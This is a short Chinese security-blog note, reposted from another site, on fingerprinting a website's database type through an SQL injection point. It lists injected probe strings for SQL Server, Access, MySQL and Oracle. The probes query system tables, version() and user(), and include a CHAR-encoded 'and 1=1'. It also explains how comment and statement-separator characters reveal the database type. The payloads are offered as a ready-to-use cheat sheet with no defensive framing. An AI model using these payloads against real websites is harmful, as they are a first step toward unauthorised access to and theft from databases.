技术笔记

通过注入点判断什么数据库类型具体方法

字号+ 作者:蜗蜗侠 来源:原创 2016-11-27 15:50 我要评论( )

通过注入点判断什么数据库类型具体方法(这个功能也是刚刚整理这个答案的时候才发现的转自myhack58) SQLSERVER: ID=1 and (select count (*) from sysobjects)0 ......

通过注入点判断什么数据库类型具体方法↓(这个功能也是刚刚整理这个答案的时候才发现的转自myhack58)
SQLSERVER:
ID=1 and (select count (*) from sysobjects)>0 返回正常
ID=1 and (select count (*) from msysobjects)>0返回异常
ID=1 and left(version(),1)=5%23  //红色字体也可能是4
ID=1 and exists(select id from sysobjects)
ID=1 and length(user)>0 
ID=1 CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
ACCESS:
ID=1 and (select count (*) from sysobjects)>0 返回异常
ID=1 and (select count (*) from msysobjects)>0返回正常
MYSQL:
id=2 and version()>0 返回正常
id=2 and length(user())>0
id=2 CHAR(97, 110, 100, 32, 49, 61, 49)
ORACLE:
ID=1  and '1'||'1'='11  
ID=1  and 0<>(select count(*) from dual) 
ID=1 CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)

其他方法:
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
“--”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/339.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 转大表哥安全狗SQL注入语句(176处)

    转大表哥安全狗SQL注入语句(176处)

    2017-12-05 13:47

  • Mysql注入点在limit关键字后面的利用方法

    Mysql注入点在limit关键字后面的利用方法

    2016-12-18 15:06

  • 一个罕见的MSSQL注入漏洞案例

    一个罕见的MSSQL注入漏洞案例

    2016-12-18 15:03

  • 通过Windows批处理自动配置DNS服务器

    通过Windows批处理自动配置DNS服务器

    2016-12-18 14:13

网友点评
暂时未开启评论功能~